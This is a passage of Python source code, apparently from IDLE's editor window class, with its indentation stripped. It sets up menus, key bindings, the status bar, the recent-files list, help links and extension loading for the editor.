elif sys.platform[:3] == 'win':
chmfile = os.path.join(sys.base_prefix, 'Doc',
'Python%s.chm' % _sphinx_version())
if os.path.isfile(chmfile):
dochome = chmfile
elif sys.platform == 'darwin':
# documentation may be stored inside a python framework
dochome = os.path.join(sys.base_prefix,
'Resources/English.lproj/Documentation/index.html')
dochome = os.path.normpath(dochome)
if os.path.isfile(dochome):
EditorWindow.help_url = dochome
if sys.platform == 'darwin':
# Safari requires real file:-URLs
EditorWindow.help_url = 'file://' + EditorWindow.help_url
else:
EditorWindow.help_url = ("https://docs.python.org/%d.%d/"
% sys.version_info[:2])
self.flist = flist
root = root or flist.root
self.root = root
self.menubar = Menu(root)
self.top = top = window.ListedToplevel(root, menu=self.menubar)
if flist:
self.tkinter_vars = flist.vars
#self.top.instance_dict makes flist.inversedict available to
#configdialog.py so it can access all EditorWindow instances
self.top.instance_dict = flist.inversedict
else:
self.tkinter_vars = {} # keys: Tkinter event names
# values: Tkinter variable instances
self.top.instance_dict = {}
self.recent_files_path = os.path.join(
idleConf.userdir, 'recent-files.lst')
self.prompt_last_line = '' # Override in PyShell
self.text_frame = text_frame = Frame(top)
self.vbar = vbar = Scrollbar(text_frame, name='vbar')
self.width = idleConf.GetOption('main', 'EditorWindow',
'width', type='int')
text_options = {
'name': 'text',
'padx': 5,
'wrap': 'none',
'highlightthickness': 0,
'width': self.width,
'tabstyle': 'wordprocessor', # new in 8.5
'height': idleConf.GetOption(
'main', 'EditorWindow', 'height', type='int'),
}
self.text = text = MultiCallCreator(Text)(text_frame, **text_options)
self.top.focused_widget = self.text
self.createmenubar()
self.apply_bindings()
self.top.protocol("WM_DELETE_WINDOW", self.close)
self.top.bind("<<close-window>>", self.close_event)
if macosx.isAquaTk():
# Command-W on editor windows doesn't work without this.
text.bind('<<close-window>>', self.close_event)
# Some OS X systems have only one mouse button, so use
# control-click for popup context menus there. For two
# buttons, AquaTk defines <2> as the right button, not <3>.
text.bind("<Control-Button-1>",self.right_menu_event)
text.bind("<2>", self.right_menu_event)
else:
# Elsewhere, use right-click for popup menus.
text.bind("<3>",self.right_menu_event)
text.bind('<MouseWheel>', self.mousescroll)
text.bind('<Button-4>', self.mousescroll)
text.bind('<Button-5>', self.mousescroll)
text.bind("<<cut>>", self.cut)
text.bind("<<copy>>", self.copy)
text.bind("<<paste>>", self.paste)
text.bind("<<center-insert>>", self.center_insert_event)
text.bind("<<help>>", self.help_dialog)
text.bind("<<python-docs>>", self.python_docs)
text.bind("<<about-idle>>", self.about_dialog)
text.bind("<<open-config-dialog>>", self.config_dialog)
text.bind("<<open-module>>", self.open_module_event)
text.bind("<<do-nothing>>", lambda event: "break")
text.bind("<<select-all>>", self.select_all)
text.bind("<<remove-selection>>", self.remove_selection)
text.bind("<<find>>", self.find_event)
text.bind("<<find-again>>", self.find_again_event)
text.bind("<<find-in-files>>", self.find_in_files_event)
text.bind("<<find-selection>>", self.find_selection_event)
text.bind("<<replace>>", self.replace_event)
text.bind("<<goto-line>>", self.goto_line_event)
text.bind("<<smart-backspace>>",self.smart_backspace_event)
text.bind("<<newline-and-indent>>",self.newline_and_indent_event)
text.bind("<<smart-indent>>",self.smart_indent_event)
text.bind("<<indent-region>>",self.indent_region_event)
text.bind("<<dedent-region>>",self.dedent_region_event)
text.bind("<<comment-region>>",self.comment_region_event)
text.bind("<<uncomment-region>>",self.uncomment_region_event)
text.bind("<<tabify-region>>",self.tabify_region_event)
text.bind("<<untabify-region>>",self.untabify_region_event)
text.bind("<<toggle-tabs>>",self.toggle_tabs_event)
text.bind("<<change-indentwidth>>",self.change_indentwidth_event)
text.bind("<Left>", self.move_at_edge_if_selection(0))
text.bind("<Right>", self.move_at_edge_if_selection(1))
text.bind("<<del-word-left>>", self.del_word_left)
text.bind("<<del-word-right>>", self.del_word_right)
text.bind("<<beginning-of-line>>", self.home_callback)
if flist:
flist.inversedict[self] = key
if key:
flist.dict[key] = self
text.bind("<<open-new-window>>", self.new_callback)
text.bind("<<close-all-windows>>", self.flist.close_all_callback)
text.bind("<<open-class-browser>>", self.open_module_browser)
text.bind("<<open-path-browser>>", self.open_path_browser)
text.bind("<<open-turtle-demo>>", self.open_turtle_demo)
self.set_status_bar()
vbar['command'] = self.handle_yview
vbar.pack(side=RIGHT, fill=Y)
text['yscrollcommand'] = vbar.set
text['font'] = idleConf.GetFont(self.root, 'main', 'EditorWindow')
text_frame.pack(side=LEFT, fill=BOTH, expand=1)
text.pack(side=TOP, fill=BOTH, expand=1)
text.focus_set()
# usetabs true -> literal tab characters are used by indent and
# dedent cmds, possibly mixed with spaces if
# indentwidth is not a multiple of tabwidth,
# which will cause Tabnanny to nag!
# false -> tab characters are converted to spaces by indent
# and dedent cmds, and ditto TAB keystrokes
# Although use-spaces=0 can be configured manually in config-main.def,
# configuration of tabs v. spaces is not supported in the configuration
# dialog. IDLE promotes the preferred Python indentation: use spaces!
usespaces = idleConf.GetOption('main', 'Indent',
'use-spaces', type='bool')
self.usetabs = not usespaces
# tabwidth is the display width of a literal tab character.
# CAUTION: telling Tk to use anything other than its default
# tab setting causes it to use an entirely different tabbing algorithm,
# treating tab stops as fixed distances from the left margin.
# Nobody expects this, so for now tabwidth should never be changed.
self.tabwidth = 8 # must remain 8 until Tk is fixed.
# indentwidth is the number of screen characters per indent level.
# The recommended Python indentation is four spaces.
self.indentwidth = self.tabwidth
self.set_notabs_indentwidth()
# If context_use_ps1 is true, parsing searches back for a ps1 line;
# else searches for a popular (if, def, ...) Python stmt.
self.context_use_ps1 = False
# When searching backwards for a reliable place to begin parsing,
# first start num_context_lines[0] lines back, then
# num_context_lines[1] lines back if that didn't work, and so on.
# The last value should be huge (larger than the # of lines in a
# conceivable file).
# Making the initial values larger slows things down more often.
self.num_context_lines = 50, 500, 5000000
self.per = per = self.Percolator(text)
self.undo = undo = self.UndoDelegator()
per.insertfilter(undo)
text.undo_block_start = undo.undo_block_start
text.undo_block_stop = undo.undo_block_stop
undo.set_saved_change_hook(self.saved_change_hook)
# IOBinding implements file I/O and printing functionality
self.io = io = self.IOBinding(self)
io.set_filename_change_hook(self.filename_change_hook)
self.good_load = False
self.set_indentation_params(False)
self.color = None # initialized below in self.ResetColorizer
if filename:
if os.path.exists(filename) and not os.path.isdir(filename):
if io.loadfile(filename):
self.good_load = True
is_py_src = self.ispythonsource(filename)
self.set_indentation_params(is_py_src)
else:
io.set_filename(filename)
self.good_load = True
self.ResetColorizer()
self.saved_change_hook()
self.update_recent_files_list()
self.load_extensions()
menu = self.menudict.get('window')
if menu:
end = menu.index("end")
if end is None:
end = -1
if end >= 0:
menu.add_separator()
end = end + 1
self.wmenu_end = end
window.register_callback(self.postwindowsmenu)
# Some abstractions so IDLE extensions are cross-IDE
self.askyesno = tkMessageBox.askyesno
self.askinteger = tkSimpleDialog.askinteger
self.showerror = tkMessageBox.showerror
# Add pseudoevents for former extension fixed keys.
# (This probably needs to be done once in the process.)
text.event_add('<<autocomplete>>', '<Key-Tab>')
text.event_add('<<try-open-completions>>', '<KeyRelease-period>',
'<KeyRelease-slash>', '<KeyRelease-backslash>')
text.event_add('<<try-open-calltip>>', '<KeyRelease-parenleft>')
text.event_add('<<refresh-calltip>>', '<KeyRelease-parenright>')
text.event_add('<<paren-closed>>', '<KeyRelease-parenright>',
'<KeyRelease-bracketright>', '<KeyRelease-braceright>')
# Former extension bindings depends on frame.text being packed
# (called from self.ResetColorizer()).
autocomplete = self.AutoComplete(self)
text.bind("<<autocomplete>>", autocomplete.autocomplete_event)
text.bind("<<try-open-completions>>",
autocomplete.try_open_completions_event)
text.bind("<<force-open-completions>>",
autocomplete.force_open_completions_event)
text.bind("<<expand-word>>", self.AutoExpand(self).expand_word_event)
text.bind("<<format-paragraph>>",
self.FormatParagraph(self).format_paragraph_event)
parenmatch = self.ParenMatch(self)
text.bind("<<flash-paren>>", parenmatch.flash_paren_event)
text.bind("<<paren-closed>>", parenmatch.paren_closed_event)
scriptbinding = ScriptBinding(self)
text.bind("<<check-module>>", scriptbinding.check_module_event)
text.bind("<<run-module>>", scriptbinding.run_module_event)
text.bind("<<do-rstrip>>", self.Rstrip(self).do_rstrip)
ctip = self.Calltip(self)
text.bind("<<try-open-calltip>>", ctip.try_open_calltip_event)
#refresh-calltip must come after paren-closed to work right
text.bind("<<refresh-calltip>>", ctip.refresh_calltip_event)
text.bind("<<force-open-calltip>>", ctip.force_open_calltip_event)
text.bind("<<zoom-height>>", self.ZoomHeight(self).zoom_height_event)
text.bind("<<toggle-code-context>>",
self.CodeContext(self).toggle_code_context_event)
squeezer = self.Squeezer(self)
text.bind("<<squeeze-current-text>>",
squeezer.squeeze_current_text_event)
def _filename_to_unicode(self, filename):
"""Return filename as BMP unicode so diplayable in Tk."""
# Decode bytes to unicode.
if isinstance(filename, bytes):
try:
filename = filename.decode(self.filesystemencoding)
except UnicodeDecodeError:
try:
filename = filename.decode(self.encoding)
except UnicodeDecodeError:
# byte-to-byte conversion
filename = filename.decode('iso8859-1')
# Replace non-BMP char with diamond questionmark.
return re.sub('[\U00010000-\U0010FFFF]', '\ufffd', filename)
def new_callback(self, event):
dirname, basename = self.io.defaultfilename()
self.flist.new(dirname)
return "break"
def home_callback(self, event):
if (event.state & 4) != 0 and event.keysym == "Home":
# state&4==Control. If <Control-Home>, use the Tk binding.
return None
if self.text.index("iomark") and \
self.text.compare("iomark", "<=", "insert lineend") and \
self.text.compare("insert linestart", "<=", "iomark"):
# In Shell on input line, go to just after prompt
insertpt = int(self.text.index("iomark").split(".")[1])
else:
line = self.text.get("insert linestart", "insert lineend")
for insertpt in range(len(line)):
if line[insertpt] not in (' ','\t'):
break
else:
insertpt=len(line)
lineat = int(self.text.index("insert").split('.')[1])
if insertpt == lineat:
insertpt = 0
dest = "insert linestart+"+str(insertpt)+"c"
if (event.state&1) == 0:
# shift was not pressed
self.text.tag_remove("sel", "1.0", "end")
else:
if not self.text.index("sel.first"):
# there was no previous selection
self.text.mark_set("my_anchor", "insert")
else:
if self.text.compare(self.text.index("sel.first"), "<",
self.text.index("insert")):
self.text.mark_set("my_anchor", "sel.first") # extend back
else:
self.text.mark_set("my_anchor", "sel.last") # extend forward
first = self.text.index(dest)
last = self.text.index("my_anchor")
if self.text.compare(first,">",last):
first,last = last,first
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", first, last)
self.text.mark_set("insert", dest)
self.text.see("insert")
return "break"
def set_status_bar(self):
self.status_bar = self.MultiStatusBar(self.top)
sep = Frame(self.top, height=1, borderwidth=1, background='grey75')
if sys.platform == "darwin":
# Insert some padding to avoid obscuring some of the statusbar
# by the resize widget.
self.status_bar.set_label('_padding1', ' ', side=RIGHT)
self.status_bar.set_label('column', 'Col: ?', side=RIGHT)
self.status_bar.set_label('line', 'Ln: ?', side=RIGHT)
self.status_bar.pack(side=BOTTOM, fill=X)
sep.pack(side=BOTTOM, fill=X)
self.text.bind("<<set-line-and-column>>", self.set_line_and_column)
self.text.event_add("<<set-line-and-column>>",
"<KeyRelease>", "<ButtonRelease>")
self.text.after_idle(self.set_line_and_column)
def set_line_and_column(self, event=None):
line, column = self.text.index(INSERT).split('.')
self.status_bar.set_label('column', 'Col: %s' % column)
self.status_bar.set_label('line', 'Ln: %s' % line)
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("format", "F_ormat"),
("run", "_Run"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
def createmenubar(self):
mbar = self.menubar
self.menudict = menudict = {}
for name, label in self.menu_specs:
underline, label = prepstr(label)
menudict[name] = menu = Menu(mbar, name=name, tearoff=0)
mbar.add_cascade(label=label, menu=menu, underline=underline)
if macosx.isCarbonTk():
# Insert the application menu
menudict['application'] = menu = Menu(mbar, name='apple',
tearoff=0)
mbar.add_cascade(label='IDLE', menu=menu)
self.fill_menus()
self.recent_files_menu = Menu(self.menubar, tearoff=0)
self.menudict['file'].insert_cascade(3, label='Recent Files',
underline=0,
menu=self.recent_files_menu)
self.base_helpmenu_length = self.menudict['help'].index(END)
self.reset_help_menu_entries()
def postwindowsmenu(self):
# Only called when Window menu exists
menu = self.menudict['window']
end = menu.index("end")
if end is None:
end = -1
if end > self.wmenu_end:
menu.delete(self.wmenu_end+1, end)
window.add_windows_to_menu(menu)
def update_menu_label(self, menu, index, label):
"Update label for menu item at index."
menuitem = self.menudict[menu]
menuitem.entryconfig(index, label=label)
def update_menu_state(self, menu, index, state):
"Update state for menu item at index."
menuitem = self.menudict[menu]
menuitem.entryconfig(index, state=state)
def handle_yview(self, event, *args):
"Handle scrollbar."
if event == 'moveto':
fraction = float(args[0])
lines = (round(self.getlineno('end') * fraction) -
self.getlineno('@0,0'))
event = 'scroll'
args = (lines, 'units')
self.text.yview(event, *args)
return 'break'
def mousescroll(self, event):
"""Handle scrollwheel event.
For wheel up, event.delta = 120*n on Windows, -1*n on darwin,
where n can be > 1 if one scrolls fast. Flicking the wheel
generates up to maybe 20 events with n up to 10 or more 1.
Macs use wheel down (delta = 1*n) to scroll up, so positive
delta means to scroll up on both systems.
X-11 sends Control-Button-4 event instead.
"""
up = {EventType.MouseWheel: event.delta > 0,
EventType.Button: event.num == 4}
lines = -5 if up[event.type] else 5
self.text.yview_scroll(lines, 'units')
return 'break'
rmenu = None
def right_menu_event(self, event):
self.text.mark_set("insert", "@%d,%d" % (event.x, event.y))
if not self.rmenu:
self.make_rmenu()
rmenu = self.rmenu
self.event = event
iswin = sys.platform[:3] == 'win'
if iswin:
self.text.config(cursor="arrow")
for item in self.rmenu_specs:
try:
label, eventname, verify_state = item
except ValueError: # see issue1207589
continue
if verify_state is None:
continue
state = getattr(self, verify_state)()
rmenu.entryconfigure(label, state=state)
rmenu.tk_popup(event.x_root, event.y_root)
if iswin:
self.text.config(cursor="ibeam")
return "break"
rmenu_specs = [
# ("Label", "<<virtual-event>>", "statefuncname"), ...
("Close", "<<close-window>>", None), # Example
]
def make_rmenu(self):
rmenu = Menu(self.text, tearoff=0)
for item in self.rmenu_specs:
label, eventname = item[0], item[1]
if label is not None:
def command(text=self.text, eventname=eventname):
text.event_generate(eventname)
rmenu.add_command(label=label, command=command)
else:
rmenu.add_separator()
self.rmenu = rmenu
def rmenu_check_cut(self):
return self.rmenu_check_copy()
def rmenu_check_copy(self):
try:
indx = self.text.index('sel.first')
except TclError:
return 'disabled'
else:
return 'normal' if indx else 'disabled'
def rmenu_check_paste(self):
try:
self.text.tk.call('tk::GetSelection', self.text, 'CLIPBOARD')
except TclError:
return 'disabled'
else:
return 'normal'
def about_dialog(self, event=None):
"Handle Help 'About IDLE' event."
# Synchronize with macosx.overrideRootMenu.about_dialog.
help_about.AboutDialog(self.top)
return "break"
def config_dialog(self, event=None):
"Handle Options 'Configure IDLE' event."
# Synchronize with macosx.overrideRootMenu.config_dialog.
configdialog.ConfigDialog(self.top,'Settings')
return "break"
def help_dialog(self, event=None):
"Handle Help 'IDLE Help' event."
# Synchronize with macosx.overrideRootMenu.help_dialog.
if self.root:
parent = self.root
else:
parent = self.top
help.show_idlehelp(parent)
return "break"
def python_docs(self, event=None):
if sys.platform[:3] == 'win':
try:
os.startfile(self.help_url)
except OSError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(self.help_url)
return "break"
def cut(self,event):
self.text.event_generate("<<Cut>>")
return "break"
def copy(self,event):
if not self.text.tag_ranges("sel"):
# There is no selection, so do nothing and maybe interrupt.
return None
self.text.event_generate("<<Copy>>")
return "break"
def paste(self,event):
self.text.event_generate("<<Paste>>")
self.text.see("insert")
return "break"
def select_all(self, event=None):
self.text.tag_add("sel", "1.0", "end-1c")
self.text.mark_set("insert", "1.0")
self.text.see("insert")
return "break"
def remove_selection(self, event=None):
self.text.tag_remove("sel", "1.0", "end")
self.text.see("insert")
return "break"
def move_at_edge_if_selection(self, edge_index):
"""Cursor move begins at start or end of selection
When a left/right cursor key is pressed create and return to Tkinter a
function which causes a cursor move from the associated edge of the
selection.
"""
self_text_index = self.text.index
self_text_mark_set = self.text.mark_set
edges_table = ("sel.first+1c", "sel.last-1c")
def move_at_edge(event):
if (event.state & 5) == 0: # no shift(==1) or control(==4) pressed
try:
self_text_index("sel.first")
self_text_mark_set("insert", edges_table[edge_index])
except TclError:
pass
return move_at_edge
def del_word_left(self, event):
self.text.event_generate('<Meta-Delete>')
return "break"
def del_word_right(self, event):
self.text.event_generate('<Meta-d>')
return "break"
def find_event(self, event):
search.find(self.text)
return "break"
def find_again_event(self, event):
search.find_again(self.text)
return "break"
def find_selection_event(self, event):
search.find_selection(self.text)
return "break"
def find_in_files_event(self, event):
grep.grep(self.text, self.io, self.flist)
return "break"
def replace_event(self, event):
replace.replace(self.text)
return "break"
def goto_line_event(self, event):
text = self.text
lineno = tkSimpleDialog.askinteger("Goto",
"Go to line number:",parent=text)
if lineno is None:
return "break"
if lineno <= 0:
text.bell()
return "break"
text.mark_set("insert", "%d.0" % lineno)
text.see("insert")
return "break"
def open_module(self):
"""Get module name from user and open it.
Return module path or None for calls by open_module_browser
when latter is not invoked in named editor window.
"""
# XXX This, open_module_browser, and open_path_browser
# would fit better in iomenu.IOBinding.
try:
name = self.text.get("sel.first", "sel.last").strip()
except TclError:
name = ''
file_path = query.ModuleName(
self.text, "Open Module",
"Enter the name of a Python module\n"
"to search on sys.path and open:",
name).result
if file_path is not None:
if self.flist:
self.flist.open(file_path)
else:
self.io.loadfile(file_path)
return file_path
def open_module_event(self, event):
self.open_module()
return "break"
def open_module_browser(self, event=None):
filename = self.io.filename
if not (self.__class__.__name__ == 'PyShellEditorWindow'
and filename):
filename = self.open_module()
if filename is None:
return "break"
from idlelib import browser
browser.ModuleBrowser(self.root, filename)
return "break"
def open_path_browser(self, event=None):
from idlelib import pathbrowser
pathbrowser.PathBrowser(self.root)
return "break"
def open_turtle_demo(self, event = None):
import subprocess
cmd = [sys.executable,
'-c',
'from turtledemo.__main__ import main; main()']
subprocess.Popen(cmd, shell=False)
return "break"
def gotoline(self, lineno):
if lineno is not None and lineno > 0:
self.text.mark_set("insert", "%d.0" % lineno)
self.text.tag_remove("sel", "1.0", "end")
self.text.tag_add("sel", "insert", "insert +1l")
self.center()
def ispythonsource(self, filename):
if not filename or os.path.isdir(filename):
return True
base, ext = os.path.splitext(os.path.basename(filename))
if os.path.normcase(ext) in (".py", ".pyw"):
return True
line = self.text.get('1.0', '1.0 lineend')
return line.startswith('#!') and 'python' in line
def close_hook(self):
if self.flist:
self.flist.unregister_maybe_terminate(self)
self.flist = None
def set_close_hook(self, close_hook):
self.close_hook = close_hook
def filename_change_hook(self):
if self.flist:
self.flist.filename_changed_edit(self)
self.saved_change_hook()
self.top.update_windowlist_registry(self)
self.ResetColorizer()
def _addcolorizer(self):
if self.color:
return
if self.ispythonsource(self.io.filename):
self.color = self.ColorDelegator()
# can add more colorizers here...
if self.color:
self.per.removefilter(self.undo)
self.per.insertfilter(self.color)
self.per.insertfilter(self.undo)
def _rmcolorizer(self):
if not self.color:
return
self.color.removecolors()
self.per.removefilter(self.color)
self.color = None
def ResetColorizer(self):
"Update the color theme"
# Called from self.filename_change_hook and from configdialog.py
self._rmcolorizer()
self._addcolorizer()
EditorWindow.color_config(self.text)
IDENTCHARS = string.ascii_letters + string.digits + "_"
def colorize_syntax_error(self, text, pos):
text.tag_add("ERROR", pos)
char = text.get(pos)
if char and char in self.IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
if '\n' == text.get(pos): # error at line end
text.mark_set("insert", pos)
else:
text.mark_set("insert", pos + "+1c")
text.see(pos)
def ResetFont(self):
"Update the text widgets' font if it is changed"
# Called from configdialog.py
self.text['font'] = idleConf.GetFont(self.root, 'main','EditorWindow')
def RemoveKeybindings(self):
"Remove the keybindings before they are changed."
# Called from configdialog.py
self.mainmenu.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
for event, keylist in keydefs.items():
self.text.event_delete(event, *keylist)
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
for event, keylist in xkeydefs.items():
self.text.event_delete(event, *keylist)
def ApplyKeybindings(self):
"Update the keybindings after they are changed"
# Called from configdialog.py
self.mainmenu.default_keydefs = keydefs = idleConf.GetCurrentKeySet()
self.apply_bindings()
for extensionName in self.get_standard_extension_names():
xkeydefs = idleConf.GetExtensionBindings(extensionName)
if xkeydefs:
self.apply_bindings(xkeydefs)
#update menu accelerators
menuEventDict = {}
for menu in self.mainmenu.menudefs:
menuEventDict[menu[0]] = {}
for item in menu[1]:
if item:
menuEventDict[menu[0]][prepstr(item[0])[1]] = item[1]
for menubarItem in self.menudict:
menu = self.menudict[menubarItem]
end = menu.index(END)
if end is None:
# Skip empty menus
continue
end += 1
for index in range(0, end):
if menu.type(index) == 'command':
accel = menu.entrycget(index, 'accelerator')
if accel:
itemName = menu.entrycget(index, 'label')
event = ''
if menubarItem in menuEventDict:
if itemName in menuEventDict[menubarItem]:
event = menuEventDict[menubarItem][itemName]
if event:
accel = get_accelerator(keydefs, event)
menu.entryconfig(index, accelerator=accel)
def set_notabs_indentwidth(self):
"Update the indentwidth if changed and not using tabs in this window"
# Called from configdialog.py
if not self.usetabs:
self.indentwidth = idleConf.GetOption('main', 'Indent','num-spaces',
type='int')
def reset_help_menu_entries(self):
"Update the additional help entries on the Help menu"
help_list = idleConf.GetAllExtraHelpSourcesList()
helpmenu = self.menudict['help']
# first delete the extra help entries, if any
helpmenu_length = helpmenu.index(END)
if helpmenu_length > self.base_helpmenu_length:
helpmenu.delete((self.base_helpmenu_length + 1), helpmenu_length)
# then rebuild them
if help_list:
helpmenu.add_separator()
for entry in help_list:
cmd = self.__extra_help_callback(entry[1])
helpmenu.add_command(label=entry[0], command=cmd)
# and update the menu dictionary
self.menudict['help'] = helpmenu
def __extra_help_callback(self, helpfile):
"Create a callback with the helpfile value frozen at definition time"
def display_extra_help(helpfile=helpfile):
if not helpfile.startswith(('www', 'http')):
helpfile = os.path.normpath(helpfile)
if sys.platform[:3] == 'win':
try:
os.startfile(helpfile)
except OSError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(helpfile)
return display_extra_help
def update_recent_files_list(self, new_file=None):
"Load and update the recent files list and menus"
rf_list = []
if os.path.exists(self.recent_files_path):
with open(self.recent_files_path, 'r',
encoding='utf_8', errors='replace') as rf_list_file:
rf_list = rf_list_file.readlines()
if new_file:
new_file = os.path.abspath(new_file) + '\n'
if new_file in rf_list:
rf_list.remove(new_file) # move to top
rf_list.insert(0, new_file)
# clean and save the recent files list
bad_paths = []
for path in rf_list:
if '\0' in path or not os.path.exists(path[0:-1]):
bad_paths.append(path)
rf_list = [path for path in rf_list if path not in bad_paths]
ulchars = "1234567890ABCDEFGHIJK"
rf_list = rf_list[0:len(ulchars)]
try:
with open(self.recent_files_path, 'w',
encoding='utf_8', errors='replace') as rf_file:
rf_file.writelines(rf_list)
except OSError as err:
if not getattr(self.root, "recentfilelist_error_displayed", False):
self.root.recentfilelist_error_displayed = True
tkMessageBox.showwarning(title='IDLE Warning',
message="Cannot update File menu Recent Files list. "
"Your operating system says:\n%s\n"
"Select OK and IDLE will continue without updating."
% self._filename_to_unicode(str(err)),
parent=self.text)
# for each edit window instance, construct the recent files menu
for instance in self.top.instance_dict:
menu = instance.recent_files_menu
menu.delete(0, END) # clear, and rebuild:
for i, file_name in enumerate(rf_list):
file_name = file_name.rstrip() # zap \n
# make unicode string to display non-ASCII chars correctly
ufile_name = self._filename_to_unicode(file_name)
callback = instance.__recent_file_callback(file_name)
menu.add_command(label=ulchars[i] + " " + ufile_name,
command=callback,
underline=0)
def __recent_file_callback(self, file_name):
def open_recent_file(fn_closure=file_name):
self.io.open(editFile=fn_closure)
return open_recent_file
def saved_change_hook(self):
short = self.short_title()
long = self.long_title()
if short and long:
title = short + " - " + long + _py_version
elif short:
title = short
elif long:
title = long
else:
title = "Untitled"
icon = short or long or title
if not self.get_saved():
title = "*%s*" % title
icon = "*%s" % icon
self.top.wm_title(title)
self.top.wm_iconname(icon)
def get_saved(self):
return self.undo.get_saved()
def set_saved(self, flag):
self.undo.set_saved(flag)
def reset_undo(self):
self.undo.reset_undo()
def short_title(self):
filename = self.io.filename
if filename:
filename = os.path.basename(filename)
else:
filename = "Untitled"
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(filename)
def long_title(self):
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(self.io.filename or "")
def center_insert_event(self, event):
self.center()
return "break"
def center(self, mark="insert"):
text = self.text
top, bot = self.getwindowlines()
lineno = self.getlineno(mark)
height = bot - top
newtop = max(1, lineno - height//2)
text.yview(float(newtop))
def getwindowlines(self):
text = self.text
top = self.getlineno("@0,0")
bot = self.getlineno("@0,65535")
if top == bot and text.winfo_height() == 1:
# Geometry manager hasn't run yet
height = int(text['height'])
bot = top + height - 1
return top, bot
def getlineno(self, mark="insert"):
text = self.text
return int(float(text.index(mark)))
def get_geometry(self):
"Return (width, height, x, y)"
geom = self.top.wm_geometry()
m = re.match(r"(\d+)x(\d+)\+(-?\d+)\+(-?\d+)", geom)
return list(map(int, m.groups()))
def close_event(self, event):
self.close()
return "break"
def maybesave(self):
if self.io:
if not self.get_saved():
if self.top.state()!='normal':
self.top.deiconify()
self.top.lower()
self.top.lift()
return self.io.maybesave()
def close(self):
reply = self.maybesave()
if str(reply) != "cancel":
self._close()
return reply
def _close(self):
if self.io.filename:
self.update_recent_files_list(new_file=self.io.filename)
window.unregister_callback(self.postwindowsmenu)
self.unload_extensions()
self.io.close()
self.io = None
self.undo = None
if self.color:
self.color.close(False)
self.color = None
self.text = None
self.tkinter_vars = None
self.per.close()
self.per = None
self.top.destroy()
if self.close_hook:
# unless override: unregister from flist, terminate if last window
self.close_hook()
def load_extensions(self):
self.extensions = {}
self.load_standard_extensions()
def unload_extensions(self):
for ins in list(self.extensions.values()):
if hasattr(ins, "close"):
ins.close()
self.extensions = {}
def load_standard_extensions(self):
for name in self.get_standard_extension_names():
try:
self.load_extension(name)
except:
print("Failed to load extension", repr(name))
traceback.print_exc()
def get_standard_extension_names(self):
return idleConf.GetExtensions(editor_only=True)
extfiles = { # Map built-in config-extension section names to file names.
'ZzDummy': 'zzdummy',
}
def load_extension(self, name):
fname = self.extfiles.get(name, name)
try:
try:
mod = importlib.import_module('.' + fname, package=__package__)
except (ImportError, TypeError):
mod = importlib.import_module(fname)
except ImportError:
print("\nFailed to import extension: ", name)
raise
cls = getattr(mod, name)
keydefs = idleConf.GetExtensionBindings(name)
if hasattr(cls, "menudefs"):
self.fill_menus(cls.menudefs, keydefs)
ins = cls(self)
self.extensions[name] = ins
if keydefs:
self.apply_bindings(keydefs)
for vevent in keydefs:
methodname = vevent.replace("-", "_")
while methodname[:1] == '<':
methodname = methodname[1:]
while methodname[-1:] == '>':
methodname = methodname[:-1]
methodname = methodname + "_event"
if hasattr(ins, methodname):
self.text.bind(vevent, getattr(ins, methodname))
def apply_bindings(self, keydefs=None):
if keydefs is None:
keydefs = self.mainmenu.default_keydefs
text = self.text
text.keydefs = keydefs
for event, keylist in keydefs.items():
if keylist:
text.event_add(event, *keylist)
def fill_menus(self, menudefs=None, keydefs=None):
"""Add appropriate entries to the menus and submenus
Menus that are absent or None in self.menudict are ignored.
"""
if menudefs is None:
menudefs = self.mainmenu.menudefs
if keydefs is None:
keydefs = self.mainmenu.default_keydefs
menudict = self.menudict
text = self.text
for mname, entrylist in menudefs:
menu = menudict.get(mname)
if not menu:
continue
for entry in entrylist:
if not entry:
menu.add_separator()
else:
label, eventname = entry
checkbutton = (label[:1] == '!')
if checkbutton:
label = label[1:]
underline, label = prepstr(label)
accelerator = get_accelerator(keydefs, eventname)
def command(text=text, eventname=eventname):
text.event_generate(eventname)
if checkbutton:
var = self.get_var_obj(eventname, BooleanVar)
menu.add_checkbutton(label=label, underline=underline,
command=command, accelerator=accelerator,
variable=var)
else:
menu.add_command(label=label, underline=underline,
command=command,
accelerator=accelerator)
def getvar(self, name):
var = self.get_var_obj(name)
if var:
value = var.get()
return value
else:
raise NameError(name)
def setvar(self, name, value, vartype=None):
var = self.get_var_obj(name, vartype)
if var:
var.set(value)
else:
raise NameError(name)
def get_var_obj(self, name, vartype=None):
var = self.tkinter_vars.get(name)
if not var and vartype:
# create a Tkinter variable object with self.text as master:
self.tkinter_vars[name] = var = vartype(self.text)
return var
# Tk implementations of "virtual text methods" -- each platform
# reusing IDLE's support code needs to define these for its GUI's
# flavor of widget.
# Is character at text_index in a Python string? Return 0 for
# "guaranteed no", true for anything else. This info is expensive
# to compute ab initio, but is probably already known by the
# platform's colorizer.
def is_char_in_string(self, text_index):
if self.color:
# Return true iff colorizer hasn't (re)gotten this far
# yet, or the character is tagged as being in a string
return self.text.tag_prevrange("TODO", text_index) or \
"STRING" in self.text.tag_names(text_index)
else:
# The colorizer is missing: assume the worst
return 1
# If a selection is defined in the text widget, return (start,
# end) as Tkinter text indices, otherwise return (None, None)
def get_selection_indices(self):
try:
first = self.text.index("sel.first")
last = self.text.index("sel.last")
return first, last
except TclError:
return None, None
# Return the text widget's current view of what a tab stop means
# (equivalent width in spaces).
def get_tk_tabwidth(self):
current = self.text['tabs'] or TK_TABWIDTH_DEFAULT
return int(current)
# Set the text widget's current view of what a tab stop means.
def set_tk_tabwidth(self, newtabwidth):
text = self.text
if self.get_tk_tabwidth() != newtabwidth:
# Set text widget tab width
pixels = text.tk.call("font", "measure", text["font"],
"-displayof", text.master,
"n" * newtabwidth)
text.configure(tabs=pixels)
### begin autoindent code ### (configuration was moved to beginning of class)
def set_indentation_params(self, is_py_src, guess=True):
if is_py_src and guess:
i = self.guess_indent()
